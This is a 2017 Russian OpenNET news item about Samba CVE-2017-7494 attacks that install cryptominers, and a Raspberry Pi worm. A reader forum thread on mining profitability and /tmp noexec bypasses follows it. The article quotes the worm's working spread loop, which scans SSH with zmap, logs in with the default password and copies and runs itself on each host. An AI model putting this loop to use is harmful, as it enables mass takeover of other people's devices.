The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Зафиксированы атаки для майнинга криптовалюты на уязвимых серверах Samba и на Raspberry Pi

11.06.2017 11:04

Исследователи лаборатории Касперского зафиксировали активность злоумышленников, связанную с попытками захвата управления над Linux-серверами, на которых не устранена критическая уязвимость (CVE-2017-7494) в Samba, позволяющая выполнить код на сервере. В отличие от похожих целевых атак на Windows-системы с уязвимостью в стеке SMB, атака на Linux-системы сводится к установке не шифровальщика-вымогателя, а ПО для майнинга криптовалют (Trojan-Downloader.Linux.EternalMiner). При успешной атаке на сервер также устанавливается бэкдор для организации удалённого входа (Backdoor.Linux.Agent).

Уязвимость в Samba требует для своей эксплуатации возможности записи в раздел. Как правило, разделы Samba экспортируются только для локальной сети, а наличие разделов Samba с доступом на запись, которые можно примонтировать из внешней сети без авторизации, само по себе уже является уязвимостью и встречается чрезвычайно редко. Отмеченная исследователями атака в основном актуальна как второй этап распространения влияния злоумышленников после первичного взлома клиентских систем в корпоративных локальных сетях. Например, первый этап взлома может осуществляться с использованием методов социальной инженерии через отправку троянского ПО сотрудникам по электронной почте. После запуска троянского ПО осуществляется сканирование доступных в локальной сети серверных систем и поражение тех, что содержат неисправленных уязвимости.

Масштаб атаки пока неизвестен, удалось узнать только характеристики кошелька, на которые поступают полученные в результате майнинга средства. За месяц на кошелёк поступило 98 XMR (около 5.5 тысяч долларов).

Дополнительно можно отметить волну атак на платы Raspberry Pi, которые подключены к глобальной сети без смены устанавливаемого по умолчанию пароля (логин pi, пароль raspberry). Исследователи из компании «Доктор Веб» выявили вредоносное ПО Linux.MulDrop.14, которое сканирует сетевые устройства с пользователем pi и типовыми паролями, задаваемыми по умолчанию, после чего устанавливает на них ПО ZMap, sshpass и компонент для майнинга криптовалют, меняет пароль для пользователя pi и запускает цикл сканирования устройств при помощи zmap с попытками входа по ssh и запуска своей копии:


   NAME=`mktemp -u 'XXXXXXXX'`
 
   while [ true ]; do
       FILE=`mktemp`
       zmap -p 22 -o $FILE -n 100000
       killall ssh scp
       for IP in `cat $FILE`
       do
           sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
       done
       rm -rf $FILE
       sleep 10
   done



  1. Главная ссылка к новости (https://securelist.ru/30889/sa...)
  2. OpenNews: Уязвимость в Samba, позволяющая выполнить код на сервере
  3. OpenNews: Раскрыты детали уязвимости Badlock в Samba
  4. OpenNews: Обновление Samba 4.4.5, 4.3.11 и 4.2.14 с устранением уязвимости
  5. OpenNews: Уязвимость в Samba 4, которая может привести к удалённому выполнению кода
  6. OpenNews: Обновление Samba 4.6.1, 4.5.7 и 4.4.12 с устранением уязвимости
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/46681-samba
Ключевые слова: samba
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (102) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 11:17, 11/06/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Майнинг. 2017 год. Лично мне он перестал приносить доход в январе-июне 2013 года, потому что появились аппаратные майнеры, которые в тысячи раз быстрее программных.
     
     
  • 2.2, Аноним (-), 11:24, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > За месяц на кошелёк поступило 98 XMR (около 5.5 тысяч долларов).

    А, так они XMR майнят. Ну что ж, можно похвалить то, что им удалось собрать майнер, который запускается у всех. У меня сначала была ошибка "GCC не поддерживает lto" - первая программа, которая попросила собрать GCC с этим USE-флагом. Перезагружался в Ubuntu, чтобы собрать. В убунте configure прошёл успешно, но компиляция не нашла AES-NI (хотя я выставил --disable-aes-ni). Обновил GCC с 4.6 до 4.8. Фух, собралось. Потом решил собрать на ARM. Оказалось что код завязан на x86-инструкции.

    Начал запускать. Майнер пишет "Ну я майню с такой-то скоростью, а если ты меня запустишь от root, то будет быстрее. Я тогда смогу выставить приоритеты для процесса". Да майнер сам по себе троян, и никаких вирусов не надо!

     
     
  • 3.26, Sw00p aka Jerom (?), 16:07, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >>Я тогда смогу выставить приоритеты для процесса"

    renice - не? http://man7.org/linux/man-pages/man1/renice.1.html

     
     
  • 4.40, Аноним (-), 21:55, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Был нормальный ответ про то, что оно там выставляет (Long Page, или что-то такое), но его удалили.
     
     
  • 5.89, Sw00p aka Jerom (?), 17:15, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    я ответил вот на это конкретное утверждение "Я тогда смогу выставить приоритеты для процесса". На утверждение "зачем ему рут (программе)" однозначно (конкретно) ответить нельзя не посмотрев исходники его (программы).

    (Long Page, или что-то такое) - вы считаете это конкретный ответ ? Long page может он и выделяет, но это один из вариантов из множества действий "для чего нужен рут".

     
     
  • 6.96, Аноним (-), 19:49, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    человек просто уточнил, что дело было не в ренайсе,
    соответственно ссылка на ман ренайса бесполезна.
    Ваш К.О.
     
  • 2.7, Аноним (-), 12:05, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    появляются все новые пирамидки. Каждый раз есть время когда майнить выгодно. Хотя, даже если просто купить, то они дорожают обычно.
     
  • 2.13, Аноним (-), 13:25, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Фигасе, как это "перестал приносить" когда rx480 окупает себя менее чем за 2 месяца? Наркоман штoле? оО
     
     
  • 3.14, soarin (ok), 13:46, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ну если папка или мамка за электричество платить будут, то может быть.
     
     
  • 4.18, Аноним (-), 14:31, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –3 +/
    120(ватт)*24(часа)*30(дней)*2(месяца)*10(центов за киловатт) = $18 за электричество за 2 месяца
    майнинг --> $4*30*2 = $240 - $18 (электричество) = $222 чистого профита

    утрись, упырь

     
     
  • 5.20, Аноним (-), 15:13, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Во первых, сама RX480 потребляет 150 Вт (по спецификации самой AMD) и даже более: http://www.hardwareluxx.ru/index.php/artikel/hardware/grafikkarten/38891-rade
    Во вторых, она у тебя майнит сама по себе, сферически в вакууме, без проца, материны и так далее?
    Так что это ты утрись, лживый упырь. Профит у него. Я знаю, где профит у тебя.
     
  • 5.23, soarin (ok), 15:44, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ну даже, если так.
    $222 за 2 месяца - весьма не большие деньги за подработку. Ведь отслеживание и прочие вещи по мониторингу, никто не отменял. Просто нажать на одну кнопку, и получать деньги не получится. А то ж намайнишь МММ-Койнов, которые через два месяца никто не возьмет.
     
     
  • 6.24, Аноним (-), 15:56, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +7 +/
    На самом деле можно почитать хотя бы вот это, чтобы понять, как обстоят дела на ниве домашнего майнинга в 2017 году:
    https://bitnovosti.com/2017/02/17/vygodno-li-majnit-bitcoin-v-2017/
    Какие там RX 480!? Фермы то не вытаскивают уже этот хренькоин.
    А там выше просто очередная петрушка кукарекнула, мол, майнит она.
     
     
  • 7.61, soarin (ok), 09:59, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > На самом деле можно почитать хотя бы вот это, чтобы понять, как обстоят дела на ниве домашнего майнинга в 2017 году: "Выгодно ли майнить биткойны в 2017?"

    Ну статья же чисто про биткойны. А тут все логично, если бы они легко майнились на любом калькуляторе, то цена бы не поднималась. В статье вот речь про Monero (XMR). Но тут опять же речь про то, на что сделать ставку, когда сплавить и так далее...
    Другое дело, что все эти "я у мамы крипто бирживой игрок" как и большинство игроков на электронных биржах очень редко объективно оценивают свой реальный доход.

     
  • 3.17, Аноним (-), 14:06, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это на каких коинах дело происходит?
     
     
  • 4.19, Аноним (-), 14:35, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    практически на любом с алгоритмом хеширования DaggerHashimoto
     
     
  • 5.29, Аноним (-), 16:43, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > DaggerHashimoto

    А в Dark Souls, Bloodborne или Nioh можно намайнить? Ну, убивая врагов, ясен пень.

     
  • 4.44, freehck (ok), 22:48, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Это на каких коинах дело происходит?

    Присоединяюсь к вопросу. Под BTC сейчас заточены такие фермы, что конкуренция на видеокартах невозможна. Но есть же криптовалюты, для которых ASIC-и нельзя создать. Так всё же, на какой криптовалюте получается такая окупаемость?

     
     
  • 5.49, Аноним (-), 00:43, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    https://www.nicehash.com/?p=calc
     
  • 3.30, Аноним (-), 17:13, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Фигасе, как это "перестал приносить" когда rx480 окупает себя менее чем за
    > 2 месяца? Наркоман штoле? оО

    Тупому школо родители прикупили "игровую карту" от "правильного производителя" за целых(!) 20 тыр! Семья разорилась, но теперь оно майнит на этой "супер-карте"!


     
     
  • 4.38, Аноним (-), 18:44, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Тупoй -- не тупoй, но имею свои $100 в день палец о палец не ударяя, а тебе завтра в офис, за загородку, в стойло, пха-ха-ха!
     
     
  • 5.39, Аноним (-), 19:02, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да не объясняй ты ему ничего, это же типичный тролль без аргументации и понимания сути вопроса, ему просто нужно высказать своё "чрезвычайно ценное" мнение.
     
     
  • 6.57, Аноним (-), 06:43, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ты тоже минер? Или пока ещё только свидетель минера? Тогда есть куда расти.


     
  • 5.51, Аноним (-), 04:04, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    те кто $100 имеют в день тут не сидят, некогда
     
  • 5.56, Аноним (-), 06:41, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Так $100 в день или в месяц? А то ты уже залгался.
     
     
  • 6.64, Аноним (-), 11:40, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Действительно, ведь больше одной видеокарты в год на руки не продают, не бывает такого чтобы у одного человека их было 10, или 50, ага?))
     
  • 5.58, Аноним (-), 08:12, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Тупoй -- не тупoй, но имею свои $100 в день палец о палец не ударяя

    Пруфы, конечно, предоставлены не будут? Ты откуда понабежал такой умный? С анонимных имеджборд? Давай пруфы сначала и выписку, сколько платишь за эскричество, в каком регионе проживаешь, какие железки, потом поговорим.

     
  • 5.62, iPony (?), 10:02, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >  в стойло

    Как-будто что-то плохое, если овёс нормальный дают.

     
  • 2.22, JL2001 (ok), 15:43, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Майнинг. 2017 год. Лично мне он перестал приносить доход в январе-июне 2013
    > года, потому что появились аппаратные майнеры, которые в тысячи раз быстрее
    > программных.

    https://geektimes.ru/post/289903/
    "Суммарная рыночная капитализация рынка криптовалют впервые в истории превысила $100 миллиардов. Из них $46 миллиардов приходятся на биткоин. Средневзвешенный курс биткоина подскочил еще 6 июня. Во вторник он увеличился до $2999,91 (по состоянию на 5:00 МСК). Таким образом курс приблизился к заветной отметке в $3000.

    В субботу, 3 июня, цена биткоина преодолела отметку в $2500."

    мне тут друзья говорят что видяхи и память раскупают майнеры, так что в магазинах полки пустые (сам не проверял)

     
     
  • 3.27, Аноним (-), 16:15, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +5 +/
    > https://geektimes.ru/post/289903/
    > "Суммарная рыночная рогокопытолизация рынка криптовалют

    fix. Прошу прощения, не смог удержаться.

     
  • 3.28, Аноним (-), 16:29, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    В Москве RX 480 лежат в магазах мёртвым грузом, а теперь к ним ещё и 580 присоединились. А вот GTX 1060, 1070 - разлетаются как горячие пирожки. 1080 не так сильно разлетаются в следствии их цены. Но на Nvidia ведь не майнят? А так у нас в магазинах всего навалом, только приходи.. с рублями. И памяти DDR4 тоже валом любой. Что ещё твои друзья говорят?
     
     
  • 4.35, Dimez (??), 18:25, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > В Москве RX 480 лежат в магазах мёртвым грузом

    Да-да, рассказывайте сказки. Особенно учитывая, что RX 470 в январе стоили 12500, а стали 23000 (и все раскуплены). В России и Украине хайп. Акции AMD поднялись на 30% почти за несколько дней.

     
  • 4.63, fsdgsdfsagsdfasdf (?), 11:18, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Автор имел в виду россию, а не москву.
    видеокарту по нормальной цене кроме как заказать из москвы/европы - не найти. Достаточно посмотреть, что творится на яндекс.маркете.
     
     
  • 5.70, Аноним (-), 13:22, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Автор имел в виду россию, а не москву.
    > видеокарту по нормальной цене кроме как заказать из москвы/европы - не найти.
    > Достаточно посмотреть, что творится на яндекс.маркете.

    В нищей России дорогие видюхи просто никто не покупает, вот их и не возят. Причём тут "расхватали"?

     
     
  • 6.73, fsdgsdfsagsdfasdf (?), 13:49, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    в принципе, это даже более логичное объяснение, однако есть нюанс в виде забитых новенькими кроссоверами под завязку парковок около центров красоты в рабочее время. страна, бедная, спору нет, но что еще хуже - в довесок нет нормального экономического распределения.
     
  • 4.109, Аноним (-), 00:15, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    И где ты в Москве увидел RX 480 или 470? Если и нашел пару штук, это не "лежит мертвым грузом.
     

  • 1.3, commiethebeastie (ok), 11:50, 11/06/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    о_О на чем они там майнят? Оно без AES-NI на 32 битной системе даёт 20 хешей на высокочастотном ядре core i3, на двух ядрах 32 хеша, потому что кеша не хватает и это при жесткой оптимизации SIMD.
     
     
  • 2.6, Аноним (-), 12:05, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ноутбук Core i5, есть AES-NI, в 2 потока 75 хешей, в 4 потока 50 хешей. На десктопном проце 400.
     
     
  • 3.21, commiethebeastie (ok), 15:36, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Ноутбук Core i5, есть AES-NI, в 2 потока 75 хешей, в 4
    > потока 50 хешей. На десктопном проце 400.

    ключевое слово AES-NI и наверняка 64 бита.

     
  • 2.43, пох (?), 22:32, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > на чем они там майнят?

    насколько я понял - на всем подряд, что удается поломать - а это могут быть и не i3, а вполне себе i7 и xeon'ы - многоголовые и далеко не с двумя ядрами.
    Под сасамбу-то вполне может стоять и вполне ничего себе так серверок.

    (история про rpi там для отвлечения внимания, если кто не понял - основной ботнет там не из rpi с дефолтным паролем, те вряд ли что-то путное намайнят, а из дырявых сасамб)

    ну и как бе если я правильно понял табличку, у ребяток-то уже под 10000 затрояненых ящиков. Неплохая ферма, пусть даже и без RX'ов. Кто там над жертвами ванакрая ржал?

     
     
  • 3.118, Аноним (-), 15:54, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >(история про rpi там для отвлечения внимания,

    скорее попытка высосать хоть что то, из того малочисленного количества R-Pi, которое удалось загнать в фермы.

     
  • 2.45, freehck (ok), 22:52, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > о_О на чем они там майнят? Оно без AES-NI на 32 битной
    > системе даёт 20 хешей на высокочастотном ядре core i3...

    Они ведь не одни майнят, а вместе с пулом. От количества проверенных лично ими хэшей напрямую зависит их доля. А поскольку не их ресурсы используются, то им и плевать собственно, сколько хешёй даёт железо: на халяву и уксус сладок.

     
  • 2.46, Vkni (ok), 23:05, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Да, первая мысель - "не дай бог так оголодать". С другой стороны, это же халява.
     
     
  • 3.77, Аноним (-), 15:08, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Не совсем халява. Надо всё-таки прикладывать соображающий мозг и прямые руки, которые можно было бы продать и за большие деньги. Кроме того, есть риск попасться и присесть, хоть и сравнительно небольшой.
     

  • 1.5, Linux Mint (?), 12:04, 11/06/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    "атака на Linux-системы сводится к установке ПО для майнинга криптовалют" - пароль администратора системы уже не нужен? Хотя уже и ответ имеется - "Исследователи лаборатории Касперского". Ждем Данилова, который научился делать САМОЗАПУСКАЮЩИЕСЯ вирусы под все системы..
     
     
  • 2.12, Ivan1986 (?), 12:45, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Ну вообще это самый популярный взлом линукс систем - с помощью пароля :)
     
  • 2.15, soarin (ok), 13:53, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > пароль администратора системы уже не нужен?

    Ну какбэ smbd зачастую и выполняется с root правами.
    А установка не значит, что по всем правил прописался - запихнется куда сможет и запустится

     
  • 2.42, Аноним (-), 22:10, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > "атака на Linux-системы сводится к установке ПО для майнинга криптовалют" - пароль администратора системы уже не нужен?

    Ты что, думаешь, "установка" там через sudo apt-get install делается? Так я тебя разочарую, можно бинарь в любое место положить и запустить, хоть в /tmp.

    > Ждем Данилова

    Чего ждать-то, у него на 5 дней раньше новость вышла:
    https://news.drweb.ru/show/?i=11320&c=5&lng=ru&p=0

     
     
  • 3.50, Аноним (-), 01:03, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > можно бинарь в любое место положить и запустить, хоть в /tmp.

    http://www.debian.org/doc/manuals/securing-debian-howto/ch4.en.html#s4.10
    > 4.10 Mounting partitions the right way
    > The noexec option prevents binaries from being executed directly

     
     
  • 4.52, iPony (?), 04:21, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Во это ты умный :D
    Речь то про не сферические и правильные установки по всем канонам.
    На них бы просто обновление samba стояло бы, вот и нет проблемы.
    Да и noexec на tmp в реальности приводит к некоторым проблемам
    https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/90085
    Безопасность и удобство обычно конфликтуют.
     
     
  • 5.53, Аноним (-), 05:34, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Плохим танцорам всегда что-то мешает Далее по ссылке Да, кто бы мог подумать, ч... большой текст свёрнут, показать
     
     
  • 6.54, iPony (?), 06:06, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Да, все можно. Собирай чемодан. Отправляйся в путешествие.
    Будешь ходить по всем домам, компаниям в поисках миллионов устройств от танцоров, где что-то не так. И делать этот мир лучше.
    А пока, как есть.
     
  • 6.55, iPony (?), 06:18, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > не требует таких уж невероятных знаний.

    Накатить обновление от уязвимости по WannaCry на венду требует и того меньше знаний. И что? Тут дело в не знаниях, а в отсутствии желания.
    Если есть что pwn'ить, то это pwn'ят.
    PS: у тебя самого то /tmp с noexec?

     
     
  • 7.66, Аноним (-), 12:10, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > у тебя самого то /tmp с noexec?

    Я тебя спешу огорчить: он только в убунте и производных без noexec монтируется :) Во всех остальных с самого начала noexec.

    $ cat /etc/fstab

    ...
    tmpfs /tmp tmpfs defaults,noexec,nosuid 0 0
    ...

    Это было по умолчанию у меня.

     
     
  • 8.69, Аноним (-), 13:15, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Брехня Поддерживаю софтину, кладущую бинарь в tmp и запускающую его оттуда Ра... текст свёрнут, показать
     
     
  • 9.76, Аноним (-), 15:08, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Моя очередь удивляться Это как В Debian по умолчанию, видимо, начиная с Jessie... текст свёрнут, показать
     
     
  • 10.78, Аноним (-), 15:16, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А вот так, представь себе По умолчанию он ограничен половиной объёма ОЗУ, что в... текст свёрнут, показать
     
     
  • 11.82, Аноним (-), 15:35, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вот у меня в tmp 3мб сейчас, и то это много Что вы там такое делаете с ним, чт... текст свёрнут, показать
     
     
  • 12.85, Аноним (-), 16:12, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Использую makeself для распаковки нескольких сотен метров ненужно, если так инте... большой текст свёрнут, показать
     
     
  • 13.90, Аноним (-), 17:34, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ну не знаю lsb_release -a No LSB modules are available Distributor ID Debi... текст свёрнут, показать
     
     
  • 14.104, Аноним (-), 22:48, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Если системд нету у меня тоже не было в jessie , то что-то смонтироваться в tm... текст свёрнут, показать
     
  • 14.117, Аноним (-), 13:11, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Проверил ещё на рабочей машине stretch и на тестовой виртуалке jessie с дефол... текст свёрнут, показать
     
  • 8.84, iPony (?), 16:06, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ну врёшь же А смысл Запустить CentOS проблем не составит ... текст свёрнут, показать
     
     
  • 9.92, Аноним (-), 17:44, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Выше смотри И заметь, я ничего не трогал ... текст свёрнут, показать
     
     
  • 10.110, iPony (?), 05:38, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А чего мне смотреть Я и Дебиан Джеси поставил Нет такого ... текст свёрнут, показать
     
  • 7.74, Аноним (-), 14:26, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/

    > Накатить обновление от уязвимости по WannaCry на венду требует и того меньше
    > знаний. И что? Тут дело в не знаниях, а в отсутствии желания.

    Сравнил копыто с гривой. Компютер пользователя-домохозяина и установленный кривыми руками по очередному не менее кривому "хауту от Васяна из 5Б" недосервачок.
    > PS: у тебя самого то /tmp с noexec?

    Да, а че?

     
  • 4.68, Аноним (-), 13:08, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >> можно бинарь в любое место положить и запустить, хоть в /tmp.
    > http://www.debian.org/doc/manuals/securing-debian-howto/ch4.en.html#s4.10
    >> 4.10 Mounting partitions the right way
    >> The noexec option prevents binaries from being executed _directly _

    Зато всегда можно запустить его indirectly.


     
     
  • 5.80, Аноним (-), 15:30, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/

    > Зато всегда можно запустить его indirectly.

    Как?

     
     
  • 6.87, Аноним (-), 16:30, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    >> Зато всегда можно запустить его indirectly.
    > Как?

    См. ветку ниже.

     
     
  • 7.88, Аноним (-), 16:42, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >>> Зато всегда можно запустить его indirectly.
    >> Как?
    > См. ветку ниже.

    Смотрел.



    /tmp% cp /bin/cat .
    /tmp% ls -l cat
    -rwxr-xr-x 1 anon anon 50980 Jun 12 16:40 cat
    /tmp% /lib/ld-linux.so.2 ./cat
    ./cat: error while loading shared libraries: ./cat: failed to map segment from shared object: Operation not permitted



     
  • 3.65, Аноним (-), 12:07, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > хоть в /tmp.

    Именно поэтому во всех нормальных дистрибутивах /tmp монтируется с noexec. Без рута ещё можно положить разве что в /home/user, но по хорошему и /home надо монтировать с noexec. А до остальных мест добраться проблематично.

     
     
  • 4.67, Аноним (-), 13:06, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > во всех нормальных дистрибутивах /tmp монтируется с noexec

    Во-первых, это ложь. Не видел ни одного такого дистрибутива.
    Во-вторых, noexec не даёт гарантии невозможности запуска файла. Всегда можно запустить скрипт через интерпретатор или ELF через ld-linux.so. Это, кстати, и является одной из причин "во-первых".

     
     
  • 5.79, Аноним (-), 15:17, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >> во всех нормальных дистрибутивах /tmp монтируется с noexec  
    > ELF через ld-linux.so.

    Сам-то хоть пробовал запустить? Ыксперд мля.


     
  • 5.81, Аноним (-), 15:31, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Во-первых, это ложь. Не видел ни одного такого дистрибутива.

    Debian.

    > Во-вторых, noexec не даёт гарантии невозможности запуска файла.

    С интерпретатором можно запустить, да. И с LD_PRELOAD можно запустить. А вот и бЯда: бинарники из /tmp запускать нельзя. Что можно сделать с помощью sh\bash и какой-то матери? И вопрос о том, как сделать его исполняемым? Как его запустить автоматом? А если есть полный доступ к системе, то зачем вообще?
    А c LD_PRELOAD можно, конечно, что угодно подключить, только я ни одного вируса такого не видел.
    Кстати, все скрипты (которые я видел), которые гадят в /tmp не запускают с помощью интерпретатора, но напрямую. Безопасность.

     
     
  • 6.86, Аноним (-), 16:29, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    С помощью sh можно сделать всё что угодно, а с помощью python или perl, которые ... большой текст свёрнут, показать
     
     
  • 7.91, Аноним (-), 17:38, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > можно, например, к нему в profile прописаться,

    Допустим, а как прописаться? Опять же запустить надо как-то автоматом.

    > Причём тут безопасность? просто это не нужно, потому что никто noexec для /tmp в реальности не использует.

    Да, но sh script.sh запускается, а 1: eval: ./script.sh: Permission denied А все эти скрипты запускают именно вторым способом. Если перемонтировать /tmp с exec, то всё работает.

     
     
  • 8.105, Аноним (-), 22:53, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Взять и прописаться Методы первоначального запуска в новости указаны 8212 уд... текст свёрнут, показать
     
  • 7.93, Аноним (-), 17:47, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > python или perl, которые де-факто есть в любой системе кроме винды

    Скажи это Stali, Arch Linux, Slackware, Gentoo и LFS. Там их может де факто не оказаться по умолчанию. А в Stali их определённо точно нету, ибо блоатваре.

     
     
  • 8.103, Аноним (-), 20:40, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ну-ну-ну, Gentoo ты сюда точно зря приплёл, насчёт Рача я тоже не уверен И кста... текст свёрнут, показать
     
  • 8.106, Аноним (-), 23:15, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ты сам-то их в глаза видел хоть раз В генте пакетный менеджер на питоне, слака ... текст свёрнут, показать
     
  • 7.99, Аноним (-), 20:11, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Точно А судя по этому списку https www cvedetails com vulnerability-list ve... большой текст свёрнут, показать
     
     
  • 8.107, Аноним (-), 23:20, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    В системе достаточно своих бинарей, чтобы удовлетворить большую часть потребност... текст свёрнут, показать
     
  • 3.97, Linux Mint (?), 19:57, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Чего ждать-то

    Вообще-то имелось ввиду, что ОДИН экземпляр вируса якобы запускается под ВСЕМИ архитектурами. Кто-то - Женя или Данилов - уже подобное обещали.

     
     
  • 4.108, Аноним (-), 23:55, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    вирус на #!/bin/sh
     
  • 3.119, Аноним (-), 15:57, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> можно бинарь в любое место положить и запустить, хоть  в /tmp.

    что то неправильно с той файловой системой, в которой в темпе могут бинарники запускаться.

     

  • 1.25, Аноним (-), 16:05, 11/06/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    Майню сейчас на SMB в Линуксе через Wine. В Линуксе блок питания потребляет на 36.6% процентов меньше чем в винде, поэтому выгода налицо. а Wine заметно добавляет к скорости майнинга. На RX 480 майнится около 1 биткоина в сутки. Иногда 10,1. Собираюсь купить ещё RX 580, пишут что там скорость майнинга ещё увеличена в неизвестное количество раз. Получаю профит и другие ништяки.
     
     
  • 2.37, Ergil (ok), 18:42, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +2 +/
    1 биткоин в сутки? Да ты вполне можешь по компу в день покупать игровому и майнить дальше :-D $3k в сутки это тебе не баран чихнул :-D
     
  • 2.41, Аноним (-), 22:00, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ну что сказать..
    Кругом майнеры-милионеры.
    Купи себе еще и Lexus RX
     
     
  • 3.47, Аноним (-), 23:25, 11/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Зачем, если можно купить еще оборудования для майнинга?
     
  • 3.60, soarin (ok), 09:46, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Я подменю клоуна.
    Встречаются две женщины бальзовскго возраста.
